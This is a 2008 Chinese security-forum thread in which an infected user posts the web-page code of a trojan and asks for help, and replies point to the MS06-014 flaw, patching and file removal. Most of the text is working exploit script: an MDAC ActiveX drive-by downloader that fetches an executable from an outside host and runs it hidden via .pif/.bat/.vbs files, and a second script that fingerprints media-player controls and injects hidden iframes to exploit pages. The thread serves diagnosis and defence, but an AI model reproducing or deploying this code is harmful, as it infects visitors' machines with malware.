昨夜风兼雨 2008-7-24 13:41
哎,我被这个破木马 弄疯了,请大家研究下
[color=red]下面提供资料
木马源文件 见 附件 网上收集的资料看
[url]http://hi.baidu.com/286455989/blog/item/1b90562a14f6559e023bf6e1.html[/url]
此人的分析详细但是没有给出解决方案!
其他的人的说法基本不行,我测试了好多木马依然在!请大家帮帮忙!
资料上说影音风暴的一个dll的漏洞!
木马的原型:TrackingCookie.Imrworldwide 貌似变种?[/color]
[b]核心代码[/b]
代码部分[quote]<script>
// Always yields the literal file name '~tmp.tmp'. The random draw scaled by
// the argument is computed and thrown away (it looks like obfuscation padding,
// not a real temp-name generator). Math is reached through the global window
// object, so this throws wherever window is not defined.
function gn(rRaGEykU1)
{
var discarded = window.Math.random() * rRaGEykU1;
return '~tmp' + '.tmp';
}
// Dropper chain, as read from the calls below: fetch rm.exe and save it as
// C:\MicroSoft.pif, write a one-line C:\MicroSoft.bat that launches the .pif,
// write C:\MicroSoft.vbs that runs the .bat hidden, then start the .vbs hidden.
// Host indicators: the three C:\MicroSoft.* files and the host ad.50db34d5.info.
// Every step is wrapped in one try/catch that swallows failures silently.
try
{
var lengyinzf,lengyinzfs,lengyinzfx;
// Payload URL (assigned without var, so it becomes a global).
lengyin='http://ad.50db34d5.info/rm/rm.exe';
// Where the downloaded bytes are written (see SaveToFile below).
Qq730255='C:\\MicroSoft.pif';
// Path of the VBScript stage.
lengyin730255='C:\\MicroSoft.vbs';
// VBScript source text: WScript.Shell.Run "cmd /c C:\MicroSoft.bat" with vbhide,
// i.e. the batch file runs with no visible window.
lengyinzf="Set lengyincn = CreateObject(\"Wscript.Shell\")" + "\n";
lengyinzfs="lengyincn.run \"cmd /c C:\\MicroSoft.bat\",vbhide";
lengyinzfx=lengyinzf+lengyinzfs;
// An <object> with classid BD96C556-65A3-11D0-983A-00C04FC29E36; the reply
// further down identifies this as the MS06-014 (MDAC RDS.DataSpace) vector.
// Its CreateObject method is what hands out the COM objects used below.
// NOTE(review): the lines ending in a bare backslash are truncated in this
// listing (closing quote and paren missing), so they are not valid JS as shown.
var chilam=window["document"]["createElement"]("object\
chilam["setAttribute"]("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\
lengyincn=gn(10000);
// Three objects obtained through the control: a FileSystemObject, an XMLHTTP
// request (progid spelled as "X"+"M"+"L"... to dodge simple string signatures)
// and an ADODB.Stream.
var hHf$R6=chilam["CreateObject"]("Scripting.FileSystemObject","\
var lengyin2=chilam["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","\
var lengyin3=chilam["CreateObject"]("Adodb.Stream","\
// Stream mode used for the raw download; it is switched to 2 below for text.
lengyin3["type"]=1;
// Special folder 0 — the Windows folder, since "\system32\cmd.exe" is built from it below.
var VgDnZXHt7=hHf$R6["GetSpecialFolder"](0);
// '~tmp.tmp' under that folder — computed but never used afterwards.
lengyincn=hHf$R6["BuildPath"](VgDnZXHt7,lengyincn);
// Shell.Application gives hidden ShellExecute calls (last argument 0 = no window).
// First call: cmd.exe /c echo cmd.exe /c C:\MicroSoft.pif >C:\MicroSoft.bat,
// which writes the one-line batch file that will launch the downloaded binary.
// (Method name in mixed case, again presumably to defeat case-sensitive signatures.)
var SmAcqIwGV8=chilam["CreateObject"]("Shell.Application","\
exp1=hHf$R6["BuildPath"](VgDnZXHt7+'\\system32','cmd.exe');
SmAcqIwGV8["SHeLlExECuTe"](exp1,' /c echo cmd.exe /c C:\\MicroSoft.pif >C:\\MicroSoft.bat',"","open",0);
// Synchronous GET of the payload (third argument 0 = not asynchronous).
lengyin2["open"]("GET",lengyin,0);
lengyin2["send"]();
// Write the raw response bytes to C:\MicroSoft.pif (2 is presumably the overwrite flag).
lengyin3["Open"]();
lengyin3["Write"](lengyin2["responseBody"]);
lengyin3["SaveToFile"](Qq730255,2);
lengyin3["Close"]();
// Reuse the same stream in text mode for the VBScript stage.
lengyin3["type"]=2;
lengyin3["Open"]();
// NOTE(review): this assigns to WriteText instead of calling WriteText(...);
// whether the .vbs actually receives the intended text cannot be confirmed here.
lengyin3["WriteText"]=lengyinzfx;
lengyin3["Savetofile"](lengyin730255,2);
lengyin3["Close"]();
// Second hidden ShellExecute: cmd.exe /c C:\MicroSoft.vbs — this starts the
// vbs -> bat -> pif chain described at the top.
SmAcqIwGV8["SHeLlExECuTe"](exp1,' /c '+lengyin730255,"","open",0)
}
// Any failure (missing control, blocked download, write error) is discarded.
catch(i)
{i=1}
</script>
<script type="text/jscript">function init() { document.write("\}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
</PRE></BODY>
</script>[/quote]
[quote]<script language="javaScript">
// Name of the marker cookie that openWM checks before it runs its probes again.
var cook = 'silentwm';
// Writes one cookie through document.cookie. The value is escape()-encoded;
// when expire (a Date) is given, an "expires=" attribute in GMT form is
// appended, otherwise a session cookie results. No path, domain or secure
// attributes are set.
function setCookie(name, value, expire)
{
var attrs = "";
if (expire != null)
{
attrs = "; expires=" + expire.toGMTString();
}
window.document.cookie = name + "=" + escape(value) + attrs;
}
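// Returns the unescape()-decoded value of the cookie called Name, or null when
// document.cookie is empty or does not contain "Name=".
// Fix: offset and end were assigned without a declaration and leaked as globals
// (a ReferenceError under strict mode); they are now locals.
// Caveat (unchanged behaviour): the lookup is a plain indexOf of "Name=", so a
// cookie whose name merely ends with Name (e.g. "xsilentwm") also matches.
function getCookie(Name)
{
var search = Name + "=";
var all = window.document.cookie;
if (all.length > 0)
{
var offset = all.indexOf(search);
if (offset != -1)
{
offset += search.length;
var end = all.indexOf(";", offset);
if (end == -1)
end = all.length;
return unescape(all.substring(offset, end));
}
}
return null;
}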
// Stores `name` as the value of the marker cookie (`cook`) with a lifetime of
// 24 hours from now. Note the argument is the cookie VALUE; the cookie name is
// always the shared `cook` constant.
function register(name)
{
var ttl = new Date();
ttl.setTime(Date.now() + 86400000);
setCookie(cook, name, ttl);
}
// Fingerprints which ActiveX controls are installed and injects a hidden iframe
// pointing at a per-control page on free.cjads.info. It runs at most once per
// browser per 24 hours, gated by the "silentwm" cookie that register() sets —
// likely so a victim is not hit repeatedly and the exploit pages are fetched less often.
function openWM()
{
var c = getCookie(cook);
if (c != null)
{
return;
}
register(cook);
window.defaultStatus="完成";
// Loaded unconditionally, invisible (height 0).
document.write('<iframe width=50 height=0 src=http://free.cjads.info/f/index.htm></iframe>');
// Probe 1: can the control with the MDAC RDS.DataSpace classid (same one as the
// first script) hand out an ADODB.Stream? If so only 014.htm is loaded
// (presumably the MS06-014 stage). `e` is assigned only inside catch, so with no
// error it stays undefined and the != "[object Error]" test passes; that a
// failed creation stringifies to "[object Error]" in old IE is assumed, not verifiable here.
// The classid line below is truncated in this listing (trailing backslash).
try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write('<iframe width=50 height=0 src=http://free.cjads.info/014.htm></iframe>')}
else
{
// Otherwise fall through to the media-player controls. Every probe has the same
// shape: new ActiveXObject(progid) inside try, and a finally that writes the iframe
// when no error was caught. Each progid string below is truncated in the listing.
// RealPlayer (IERPCtl, progid split to defeat string matching): PRODUCTVERSION is
// compared with <= as a string, i.e. lexicographically, not numerically.
// Versions at or below 6.0.14.552 get real11.htm, anything else real10.htm.
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1\}
catch(j){};
finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<iframe width=100 height=100 src=http://free.cjads.info/real11.htm></iframe>')}
else
{
document.write('<iframe width=100 height=100 src=http://free.cjads.info/real10.htm></iframe>')}}}
// GLIEDown.IEDown.1 present -> lz.htm (display:none iframe).
try{ var g;
var glworld=new ActiveXObject("GLIEDown.IEDown.1\}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src=http://free.cjads.info/lz.htm></iframe>')}}
// MPS.StormPlayer.1 (Storm Player, the 影音风暴 control the original post mentions) -> bf.htm.
try{ var h;
var storm=new ActiveXObject("MPS.StormPlayer.1\}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src=http://free.cjads.info/bf.htm></iframe>')}}
// DPClient.Vod present -> kong.htm (the variable name suggests Thunder / 迅雷).
try{ var f;
var thunder=new ActiveXObject("DPClient.Vod\}
catch(f){};
finally{ if(f!="[object Error]"){
document.write('<iframe width=50 height=0 src=http://free.cjads.info/kong.htm></iframe>')}}
}}
}
// Entry point: runs the cookie gate and the control probes synchronously while
// the page is still parsing (the document.write calls inside openWM depend on that).
openWM();
</script>
<script src=http://js.tongji.cn.yahoo.com/621252/ystat.js></script>
[/quote]
[[i] 本帖最后由 昨夜风兼雨 于 2008-7-24 13:42 编辑 [/i]]
僵尸道长 2008-7-25 16:27
用MS06014的IE漏洞挂的马(第一段代码里的 classid BD96C556-65A3-11D0-983A-00C04FC29E36 就是 MDAC RDS.DataSpace 控件),楼主的机器该打补丁了。另外第二段脚本还会逐个探测 RealPlayer(IERPCtl)、GLIEDown、暴风影音(MPS.StormPlayer)和 DPClient.Vod 这几个 ActiveX 控件并挂不同页面,所以这些播放器也要一起升级或禁用;同时检查并删除落地文件 C:\MicroSoft.pif、C:\MicroSoft.vbs、C:\MicroSoft.bat。
用金山清理专家清除一下病毒吧。
[url]http://client.download.duba.net/KASSetup_10_1.exe[/url]
ljb_ 2008-7-25 16:29
回复 4 楼 僵尸道长的帖子
恩,喜歡道長出來解決問題~:) :)
昨夜风兼雨 2008-7-26 11:15
我自己去试了下~~最新的那个360 顽固木马 专杀工具可以对付~~~~
ynhnqlzyh 2008-10-9 15:45
都知道是漏洞了 你就应该先打好补丁嘛
654478225 2008-10-12 02:59
代码看不懂啊,以后多学习了。